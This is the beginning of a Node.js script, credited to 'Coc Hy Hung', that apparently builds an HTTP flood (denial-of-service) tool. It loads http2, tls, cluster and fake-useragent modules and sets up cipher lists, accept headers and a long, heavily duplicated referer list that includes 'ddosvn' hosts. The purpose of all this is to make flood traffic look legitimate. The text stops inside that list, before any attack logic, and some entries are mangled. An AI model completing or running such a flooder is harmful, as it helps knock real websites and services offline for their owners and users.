/*
 ▄▄·        ▄▄·      ▄ .▄ ▄· ▄▌     ▄ .▄▄• ▄▌ ▐ ▄  ▄▄ • 
▐█ ▌▪▪     ▐█ ▌▪    ██▪▐█▐█▪██▌    ██▪▐██▪██▌•█▌▐█▐█ ▀ ▪
██ ▄▄ ▄█▀▄ ██ ▄▄    ██▀▐█▐█▌▐█▪    ██▀▐██▌▐█▌▐█▐▐▌▄█ ▀█▄
▐███▌▐█▌.▐▌▐███▌    ██▌▐▀ ▐█▀·.    ██▌▐▀▐█▄█▌██▐█▌▐█▄▪▐█
·▀▀▀  ▀█▄▀▪·▀▀▀     ▀▀▀ ·  ▀ •     ▀▀▀ · ▀▀▀ ▀▀ █▪·▀▀▀▀ 
from Coc Hy Hung with love <3
script made by Coc Hy Hung
*/
// xD ~Aya

const url = require('url'),
fs = require('fs'),
http2 = require('http2'),
http = require('http'),
tls = require('tls'),
net = require('net'),
cluster = require('cluster'),
gradient = require('gradient-string'),
fakeua = require('fake-useragent'),
cplist = [
    "ECDHE-RSA-AES256-SHA:RC4-SHA:RC4:HIGH:!MD5:!aNULL:!EDH:!AESGCM",
    "ECDHE-RSA-AES256-SHA:AES256-SHA:HIGH:!AESGCM:!CAMELLIA:!3DES:!EDH",
    "AESGCM+EECDH:AESGCM+EDH:!SHA1:!DSS:!DSA:!ECDSA:!aNULL",
    "EECDH+CHACHA20:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:RSA+3DES:!MD5",
    "HIGH:!aNULL:!eNULL:!LOW:!ADH:!RC4:!3DES:!MD5:!EXP:!PSK:!SRP:!DSS",
    "ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA256:DHE-RSA-AES256-SHA:!aNULL:!eNULL:!EXPORT:!DSS:!DES:!RC4:!3DES:!MD5:!PSK"
],
Content_type = [
    'multipart/form-data, application/x-url-encoded'
],
accept_header = [
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3'
],
referers = [
    'https://www.google.com/',
    'https://eu1.proxysite.com/process.php?d=',
    'https://eu2.proxysite.com/process.php?d=',
    'https://eu3.proxysite.com/process.php?d=',
    'https://eu4.proxysite.com/process.php?d=',
    'https://eu5.proxysite.com/process.php?d=',
    'https://eu6.proxysite.com/process.php?d=',
    'https://eu7.proxysite.com/process.php?d=',
    'https://eu8.proxysite.com/process.php?d=',
    'https://eu9.proxysite.com/process.php?d=',
    'https://eu10.proxysite.com/process.php?d=',
    'https://us1.proxysite.com/process.php?d=',
    'https://us2.proxysite.com/process.php?d=',
    'https://us3.proxysite.com/process.php?d=',
    'https://us4.proxysite.com/process.php?d=',
    'https://us5.proxysite.com/process.php?d=',
    'https://us6.proxysite.com/process.php?d=',
    'https://us7.proxysite.com/process.php?d=',
    'https://us8.proxysite.com/process.php?d=',
    'https://us9.proxysite.com/process.php?d=',
    'https://us10.proxysite.com/process.php?d=',
    'https://us11.proxysite.com/process.php?d=',
    'https://us12.proxysite.com/process.php?d=',
    'https://us13.proxysite.com/process.php?d=',
    'https://us14.proxysite.com/process.php?d=',
    'https://us15.proxysite.com/process.php?d=',
    'https://divine.graphics/proxy.php?',
    'https://www.localizaip.com.br/localizar-ip.php?ip=',
    'http://www.meuenderecoip.com/localizar-ip.php?ip=',
    'https://website-down.com/',
    'http://proxy.clgt.net/proxy.php/',
    'https://www.pinterest.com/pin/create/button/?url=',
    'https://www.reddit.com/login/?dest=',
    'https://www.reddit.com/submit?url=',
    'https://www.filterbypass.me/s.php?k=',
    'https://www.filterbypass.me/?url=',
    'https://quantrimang.com/url?q=',
    'https://learnsql.xyz/chuyen-huong/?url=',
    'https://user.gtarcade.com/site/login?rurl=',
    'http://e9geolgzk6.com/iuqasfg3?dbqfdh=34&refer=',
    'https://iplookup.flagfox.net/?host=',
    'https://foradoar.org/',
    'https://duckduckgo.com/',
    'https://www.google.com/',
    'https://www.youtube.com',
    'http://www.google.com/?q=',
    'https://www.responsinator.com/?url=',
    'https://king.host/wiki/?url=',
    'https://website.grader.com/results/',
    'https://sitecheck.sucuri.net/results/',
    'https://www.ssllabs.com/ssltest/analyze.html?d=',
    'https://transparencyreport.google.com/safe-browsing/search?url=',
    'https://www.webpagetest.org/?url=',
    'https://www.hostinger.com.br/tutoriais/?url=',
    'https://www.sslshopper.com/ssl-checker.html#hostname=',
    'https://safeweb.norton.com/report/show?url=',
    'http://www.usatoday.com/search/results?q=',
    'http://engadget.search.aol.com/search?q=',
    'http://validator.w3.org/check?uri=',
    'http://www.facebook.com/sharer/sharer.php?u=',
    'http://downforeveryoneorjustme.com/',
    'http://network-tools.com/default.asp?prog=ping&host=',
    'http://network-tools.com/default.asp?prog=trace&host=',
    'http://network-tools.com/default.asp?prog=network&host=',
    'https://domainr.com/?q=',
    'https://down.is/',
    'http://whois.domaintools.com/',
    'https://downforeveryoneorjustme.com/',
    'https://www.webhostinghero.com/#',
    'https://www.whoishostingthis.com/#search=',
    'https://ping.eu/port-chk/?url=',
    'https://www.host-tracker.com/?url=',
    'http://hostchecker.net/?url=',
    'https://hostingchecker.com/?url=',
    'https://www.virustotal.com/vi/?url=',
    'http://tainhachay.mobi/?url=',
    'http://trangtainhac.info/?url=',
    'http://www.phimmoi.net/?url=',
    'https://website.informer.com/',
    'https://tainhacvemay.net/?url=',
    'https://nhacvietnam.mobi/?url=',
    'https://waptainhac.net/?url=',
    'https://trangtainhac.net/?url=',
    'https://trangtainhac.com/?url=',
    'https://yamcode.com/?url=',
    'http://network-tools.com/default.asp?prog=ping&host=',
    'http://network-tools.com/default.asp?prog=trace&host=',
    'http://network-tools.com/default.asp?prog=network&host=',
    'http://waptaiaz.com/tai-nhac-mp3/web/artist/list/quality=1&ver=w/?url=',
    'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=',
    'http://www.google.com/?q=',
    'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=',
    'https://drive.google.com/viewerng/viewer?url=',
    'http://www.google.com/translate?u=',
    'https://developers.google.com/speed/pagespeed/insights/?url=',
    'http://help.baidu.com/searchResult?keywords=',
    'http://www.bing.com/search?q=',
    'https://add.my.yahoo.com/rss?url=',
    'https://play.google.com/store/search?q=',
    'http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..',
    'http://vk.com/profile.php?redirect=',
    'http://www.usatoday.com/search/results?q=',
    'http://engadget.search.aol.com/search?q=query?=query=..',
    'https://v1.push-time.com/notifications/pub2/cpm/3/infinity/index.html?p1=',
    'https://browsergames2018.com/bestgames/custom/anime/oven/hentai/index.php?country_code=VN&p1=',
    'https://www.google.ru/#hl=ru&newwindow=1?&saf..,or.r_gc.r_pw=?.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=882',
    'https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925',
    'http://yandex.ru/yandsearch?text=',
    'https://www.google.ru/#hl=ru&newwindow=1&safe..,iny+gay+q=pcsny+=;zdr+query?=poxy+pony&gs_l=hp.3.r?=.0i19.505.10687.0.10963.33.29.4.0.0.0.242.4512.0j26j3.29.0.clfh..0.0.dLyKYyh2BUc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp?=?fd2cf4e896a87c19&biw=1389&bih=832',
    'http://go.mail.ru/search?mail.ru=1&q=',
    'http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..',
    'http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..',
    'http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..',
    'http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..',
    'http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..',
    'https://www.google.us/#hl=en-US?&newwindow=1&safe=off&sclient=psy=?-ab&query=%D0%BA%D0%B0%Dq=?0%BA+%D1%83%()_D0%B1%D0%B=8%D1%82%D1%8C+%D1%81bvc?&=query&%D0%BB%D0%BE%D0%BD%D0%B0q+=%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+%D1%87%D0%BB%D0%B5%D0%BD&oq=q=%D0%BA%D0%B0%D0%BA+%D1%83%D0%B1%D0%B8%D1%82%D1%8C+%D1%81%D0%BB%D0%BE%D0%BD%D0%B0+%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D1%DO%D2%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+?%D1%87%D0%BB%D0%B5%D0%BD&gs_l=hp.3...192787.206313.12.206542.48.46.2.0.0.0.190.7355.0j43.45.0.clfh..0.0.ytz2PqzhMAc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=?882',
    'http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..',
    'http://www.google.ru/url?sa=t&rct=?j&q=&e..',
    'http://help.baidu.com/searchResult?keywords=',
    'http://www.bing.com/search?q=',
    'https://www.yandex.com/yandsearch?text=',
    'https://duckduckgo.com/?q=',
    'http://www.ask.com/web?q=',
    'http://search.aol.com/aol/search?q=',
    'https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=',
    'https://drive.google.com/viewerng/viewer?url=',
    'http://validator.w3.org/feed/check.cgi?url=',
    'http://host-tracker.com/check_page/?furl=',
    'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=',
    'https://jigsaw.w3.org/css-validator/validator?uri=',
    'https://add.my.yahoo.com/rss?url=',
    'http://engadget.search.aol.com/search?q=',
    'https://steamcommunity.com/market/search?q=',
    'http://filehippo.com/search?q=',
    'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
    'http://eu.battle.net/wow/en/search?q=',
    'http://engadget.search.aol.com/search?q=',
    'http://careers.gatesfoundation.org/search?q=',
    'http://techtv.mit.edu/search?q=',
    'http://www.ustream.tv/search?q=',
    'http://www.ted.com/search?q=',
    'http://funnymama.com/search?q=',
    'http://itch.io/search?q=',
    'http://jobs.rbs.com/jobs/search?q=',
    'http://taginfo.openstreetmap.org/search?q=',
    'http://www.baoxaydung.com.vn/news/vn/search&q=',
    'https://play.google.com/store/search?q=',
    'http://www.tceq.texas.gov/@@tceq-search?q=',
    'http://www.reddit.com/search?q=',
    'http://www.bestbuytheater.com/events/search?q=',
    'https://careers.carolinashealthcare.org/search?q=',
    'http://jobs.leidos.com/search?q=',
    'http://jobs.bloomberg.com/search?q=',
    'https://www.pinterest.com/search/?q=',
    'http://millercenter.org/search?q=',
    'https://www.npmjs.com/search?q=',
    'http://www.evidence.nhs.uk/search?q=',
    'http://www.shodanhq.com/search?q=',
    'http://ytmnd.com/search?q=',
    'http://www.google.com/?q=',
    'http://www.google.com/?q=',
    'http://www.google.com/?q=',
    'http://www.usatoday.com/search/results?q=',
    'http://engadget.search.aol.com/search?q=',
    'https://steamcommunity.com/market/search?q=',
    'http://filehippo.com/search?q=',
    'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
    'http://eu.battle.net/wow/en/search?q=',
    'http://engadget.search.aol.com/search?q=',
    'http://careers.gatesfoundation.org/search?q=',
    'http://techtv.mit.edu/search?q=',
    'http://www.ustream.tv/search?q=',
    'http://www.ted.com/search?q=',
    'http://funnymama.com/search?q=',
    'http://itch.io/search?q=',
    'http://jobs.rbs.com/jobs/search?q=',
    'http://taginfo.openstreetmap.org/search?q=',
    'http://www.baoxaydung.com.vn/news/vn/search&q=',
    'https://play.google.com/store/search?q=',
    'http://www.tceq.texas.gov/@@tceq-search?q=',
    'http://www.reddit.com/search?q=',
    'http://www.bestbuytheater.com/events/search?q=',
    'https://careers.carolinashealthcare.org/search?q=',
    'http://jobs.leidos.com/search?q=',
    'http://jobs.bloomberg.com/search?q=',
    'https://www.pinterest.com/search/?q=',
    'http://millercenter.org/search?q=',
    'https://www.npmjs.com/search?q=',
    'http://www.evidence.nhs.uk/search?q=',
    'http://www.shodanhq.com/search?q=',
    'http://ytmnd.com/search?q=',
    'http://engadget.search.aol.com/search?q=',
    'https://steamcommunity.com/market/search?q=',
    'http://filehippo.com/search?q=',
    'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
    'http://eu.battle.net/wow/en/search?q=',
    'http://engadget.search.aol.com/search?q=',
    'http://careers.gatesfoundation.org/search?q=',
    'http://techtv.mit.edu/search?q=',
    'http://www.ustream.tv/search?q=',
    'http://www.ted.com/search?q=',
    'http://funnymama.com/search?q=',
    'http://itch.io/search?q=',
    'http://jobs.rbs.com/jobs/search?q=',
    'http://taginfo.openstreetmap.org/search?q=',
    'http://www.baoxaydung.com.vn/news/vn/search&q=',
    'https://play.google.com/store/search?q=',
    'http://www.tceq.texas.gov/@@tceq-search?q=',
    'http://www.reddit.com/search?q=',
    'http://www.bestbuytheater.com/events/search?q=',
    'https://careers.carolinashealthcare.org/search?q=',
    'http://jobs.leidos.com/search?q=',
    'http://jobs.bloomberg.com/search?q=',
    'https://www.pinterest.com/search/?q=',
    'http://millercenter.org/search?q=',
    'https://www.npmjs.com/search?q=',
    'http://www.evidence.nhs.uk/search?q=',
    'http://www.shodanhq.com/search?q=',
    'http://ytmnd.com/search?q=',
    'http://engadget.search.aol.com/search?q=',
    'https://steamcommunity.com/market/search?q=',
    'http://filehippo.com/search?q=',
    'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
    'http://eu.battle.net/wow/en/search?q=',
    'http://engadget.search.aol.com/search?q=',
    'http://careers.gatesfoundation.org/search?q=',
    'http://techtv.mit.edu/search?q=',
    'http://www.ustream.tv/search?q=',
    'http://www.ted.com/search?q=',
    'http://funnymama.com/search?q=',
    'http://itch.io/search?q=',
    'http://jobs.rbs.com/jobs/search?q=',
    'http://taginfo.openstreetmap.org/search?q=',
    'http://www.baoxaydung.com.vn/news/vn/search&q=',
    'https://play.google.com/store/search?q=',
    'http://www.tceq.texas.gov/@@tceq-search?q=',
    'http://www.reddit.com/search?q=',
    'http://www.bestbuytheater.com/events/search?q=',
    'https://careers.carolinashealthcare.org/search?q=',
    'http://jobs.leidos.com/search?q=',
    'http://jobs.bloomberg.com/search?q=',
    'https://www.pinterest.com/search/?q=',
    'http://millercenter.org/search?q=',
    'https://www.npmjs.com/search?q=',
    'http://www.evidence.nhs.uk/search?q=',
    'http://www.shodanhq.com/search?q=',
    'http://ytmnd.com/search?q=',
    'http://coccoc.com/search#query=',
    'http://www.search.com/search?q=',
    'http://www.google.com/?q=',
    'http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..',
    'http://vk.com/profile.php?redirect=',
    'http://www.usatoday.com/search/results?q=',
    'http://engadget.search.aol.com/search?q=query?=query=..',
    'https://www.google.ru/#hl=ru&newwindow=1?&saf..,or.r_gc.r_pw=?.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=882',
    'https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925',
    'http://yandex.ru/yandsearch?text=',
    'https://www.google.ru/#hl=ru&newwindow=1&safe..,iny+gay+q=pcsny+=;zdr+query?=poxy+pony&gs_l=hp.3.r?=.0i19.505.10687.0.10963.33.29.4.0.0.0.242.4512.0j26j3.29.0.clfh..0.0.dLyKYyh2BUc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp?=?fd2cf4e896a87c19&biw=1389&bih=832',
    'http://go.mail.ru/search?mail.ru=1&q=',
    'http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..',
    'http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..',
    'http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..',
    'http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..',
    'http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..',
    'https://www.google.us/#hl=en-US?&newwindow=1&safe=off&sclient=psy=?-ab&query=%D0%BA%D0%B0%Dq=?0%BA+%D1%83%()_D0%B1%D0%B=8%D1%82%D1%8C+%D1%81bvc?&=query&%D0%BB%D0%BE%D0%BD%D0%B0q+=%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+%D1%87%D0%BB%D0%B5%D0%BD&oq=q=%D0%BA%D0%B0%D0%BA+%D1%83%D0%B1%D0%B8%D1%82%D1%8C+%D1%81%D0%BB%D0%BE%D0%BD%D0%B0+%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D1%DO%D2%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+?%D1%87%D0%BB%D0%B5%D0%BD&gs_l=hp.3...192787.206313.12.206542.48.46.2.0.0.0.190.7355.0j43.45.0.clfh..0.0.ytz2PqzhMAc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=?882',
    'http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..',
    'http://www.google.ru/url?sa=t&rct=?j&q=&e..',
    'http://help.baidu.com/searchResult?keywords=',
    'http://www.bing.com/search?q=',
    'https://www.yandex.com/yandsearch?text=',
    'https://duckduckgo.com/?q=',
    'http://www.ask.com/web?q=',
    'http://search.aol.com/aol/search?q=',
    'https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=',
    'https://www.facebook.com/search/results/?init=quick&q=',
    'http://blekko.com/#ws/?q=',
    'http://www.infomine.com/search/?q=',
    'https://twitter.com/search?q=',
    'http://www.wolframalpha.com/input/?i=',
    'http://host-tracker.com/check_page/?furl=',
    'http://jigsaw.w3.org/css-validator/validator?uri=',
    'http://www.google.com/translate?u=',
    'http://anonymouse.org/cgi-bin/anon-www.cgi/',
    'http://www.onlinewebcheck.com/?url=',
    'http://feedvalidator.org/check.cgi?url=',
    'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL',
    'http://www.translate.ru/url/translation.aspx?direction=er&sourceURL=',
    'http://validator.w3.org/feed/check.cgi?url=',
    'http://www.pagescoring.com/website-speed-test/?url=',
    'http://check-host.net/check-http?host=',
    'http://checksite.us/?url=',
    'http://jobs.bloomberg.com/search?q=',
    'http://www.bing.com/search?q=',
    'https://www.yandex.com/yandsearch?text=',
    'http://www.google.com/?q=',
    'https://add.my.yahoo.com/rss?url=',
    'http://www.bestbuytheater.com/events/search?q=',
    'http://www.shodanhq.com/search?q=',
    'https://play.google.com/store/search?q=',
    'http://coccoc.com/search#query=',
    'https://w...content-available-to-author-only...m.vn/?gws_rd=ssl#q=',
    'http://y...content-available-to-author-only...x.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..',
    'http://content-available-to-author-only.com/profile.php?redirect=',
    'http://w...content-available-to-author-only...y.com/search/results?q=',
    'http://y...content-available-to-author-only...x.ru/yandsearch?text=',
    'http://g...content-available-to-author-only...l.ru/search?mail.ru=1&q=',
    'http://n...content-available-to-author-only...r.ru/search?=btnG?=%D0?2?%D0?2?%=D0..',
    'http://r...content-available-to-author-only...a.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..',
    'http://r...content-available-to-author-only...o.com/search;_yzt=?=A7x9Q.bs67zf..',
    'http://r...content-available-to-author-only...o.com/search;?_query?=l%t=?=?A7x..',
    'http://g...content-available-to-author-only...l.ru/search?gay.ru.query=1&q=?abc.r..',
    'http://n...content-available-to-author-only...r.ru/search?btnG=%D0%9D%?D0%B0%D0%B..',
    'http://w...content-available-to-author-only...e.ru/url?sa=t&rct=?j&q=&e..',
    'http://h...content-available-to-author-only...u.com/searchResult?keywords=',
    'http://w...content-available-to-author-only...g.com/search?q=',
    'https://w...content-available-to-author-only...x.com/yandsearch?text=',
    'https://d...content-available-to-author-only...o.com/?q=',
    'http://w...content-available-to-author-only...k.com/web?q=',
    'http://s...content-available-to-author-only...l.com/aol/search?q=',
    'https://w...content-available-to-author-only...m.nl/vaste-onderdelen/zoeken/?zoeken_term=',
    'http://v...content-available-to-author-only...3.org/feed/check.cgi?url=',
    'http://h...content-available-to-author-only...r.com/check_page/?furl=',
    'http://w...content-available-to-author-only...r.com/url/translation.aspx?direction=er&sourceURL=',
    'http://j...content-available-to-author-only...3.org/css-validator/validator?uri=',
    'https://a...content-available-to-author-only...o.com/rss?url=',
    'http://e...content-available-to-author-only...l.com/search?q=',
    'https://s...content-available-to-author-only...y.com/market/search?q=',
    'http://f...content-available-to-author-only...o.com/search?q=',
    'http://w...content-available-to-author-only...t.com/site/pinterest.com/search?q=',
    'http://e...content-available-to-author-only...e.net/wow/en/search?q=',
    'http://e...content-available-to-author-only...l.com/search?q=',
    'http://c...content-available-to-author-only...n.org/search?q=',
    'http://t...content-available-to-author-only...t.edu/search?q=',
    'http://w...content-available-to-author-only...m.tv/search?q=',
    'http://w...content-available-to-author-only...d.com/search?q=',
    'http://f...content-available-to-author-only...a.com/search?q=',
    'http://i...content-available-to-author-only...h.io/search?q=',
    'http://j...content-available-to-author-only...s.com/jobs/search?q=',
    'http://t...content-available-to-author-only...p.org/search?q=',
    'http://w...content-available-to-author-only...m.vn/news/vn/search&q=',
    'https://play.google.com/store/search?q=',
    'http://w...content-available-to-author-only...s.gov/@@tceq-search?q=',
    'http://w...content-available-to-author-only...t.com/search?q=',
    'http://w...content-available-to-author-only...r.com/events/search?q=',
    'https://c...content-available-to-author-only...e.org/search?q=',
    'http://j...content-available-to-author-only...s.com/search?q=',
    'http://j...content-available-to-author-only...g.com/search?q=',
    'https://w...content-available-to-author-only...t.com/search/?q=',
    'http://m...content-available-to-author-only...r.org/search?q=',
    'https://w...content-available-to-author-only...s.com/search?q=',
    'http://w...content-available-to-author-only...s.uk/search?q=',
    'http://w...content-available-to-author-only...q.com/search?q=',
    'http://www.search.com/search?q=',
    'https://add.my.yahoo.com/rss?url=',
    'https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?container=focus&url=',
    'https://www.facebook.com/l.php?u=',
    'https://drive.google.com/viewerng/viewer?url=',
    'http://www.google.com/translate?u=',
    'http://downforeveryoneorjustme.com/',
    'http://www.slickvpn.com/go-dark/browse.php?u=',
    'https://www.megaproxy.com/go/_mp_framed?',
    'http://scanurl.net/?u=',
    'http://www.isup.me/',
    'http://check-host.net/check-tcp?host=',
    'http://check-host.net/check-dns?host=',
    'http://check-host.net/check-ping?host=',
    'http://www.currentlydown.com/',
    'http://check-host.net/ip-info?host=',
    'https://safeweb.norton.com/report/show?url=',
    'http://www.webproxy.net/view?q=',
    'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=',
    'https://anonysurfer.com/a2/index.php?q=',
    'http://analiz.web.tr/en/www/',
    'https://plus.google.com/share?url=',
    'http://anonymouse.org/cgi-bin/anon-www.cgi/',
    'http://ddosvn.somee.com/f5.php?v=',
    'http://louis-ddosvn.rhcloud.com/f5.html?v=',
    'http://engadget.search.aol.com/search?q=query?=query=..',
    'https://graph.facebook.com/fql?q=SELECT%20like_count,%20total_count,%20share_count,%20click_count,%20comment_count%20FROM%20link_stat%20WHERE%20url%20=%20%22',
    'https://www.google.ru/#hl=ru&newwindow=1?&saf..,or.r_gc.r_pw=?.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=882',
    'https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925',
    'http://yandex.ru/yandsearch?text=',
    'https://www.google.ru/#hl=ru&newwindow=1&safe..,iny+gay+q=pcsny+=;zdr+query?=poxy+pony&gs_l=hp.3.r?=.0i19.505.10687.0.10963.33.29.4.0.0.0.242.4512.0j26j3.29.0.clfh..0.0.dLyKYyh2BUc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp?=?fd2cf4e896a87c19&biw=1389&bih=832',
    'http://go.mail.ru/search?mail.ru=1&q=',
    'http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..',
    'http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..',
    'http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..',
    'http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..',
    'http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..',
    'https://www.google.us/#hl=en-US?&newwindow=1&safe=off&sclient=psy=?-ab&query=%D0%BA%D0%B0%Dq=?0%BA+%D1%83%()_D0%B1%D0%B=8%D1%82%D1%8C+%D1%81bvc?&=query&%D0%BB%D0%BE%D0%BD%D0%B0q+=%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+%D1%87%D0%BB%D0%B5%D0%BD&oq=q=%D0%BA%D0%B0%D0%BA+%D1%83%D0%B1%D0%B8%D1%82%D1%8C+%D1%81%D0%BB%D0%BE%D0%BD%D0%B0+%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D1%DO%D2%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+?%D1%87%D0%BB%D0%B5%D0%BD&gs_l=hp.3...192787.206313.12.206542.48.46.2.0.0.0.190.7355.0j43.45.0.clfh..0.0.ytz2PqzhMAc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=?882',
    'http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..',
    'http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..',
    'http://vk.com/profile.php?redirect=',
    'http://www.usatoday.com/search/results?q=',
    'http://engadget.search.aol.com/search?q=query?=query=..',
    'https://www.google.ru/#hl=ru&newwindow=1?&saf..,or.r_gc.r_pw=?.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=882',
    'https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925',
    'http://yandex.ru/yandsearch?text=',
    'https://www.google.ru/#hl=ru&newwindow=1&safe..,iny+gay+q=pcsny+=;zdr+query?=poxy+pony&gs_l=hp.3.r?=.0i19.505.10687.0.10963.33.29.4.0.0.0.242.4512.0j26j3.29.0.clfh..0.0.dLyKYyh2BUc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp?=?fd2cf4e896a87c19&biw=1389&bih=832',
    'http://go.mail.ru/search?mail.ru=1&q=',
    'http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..',
    'http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..',
    'http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..',
    'http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..',
    'http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..',
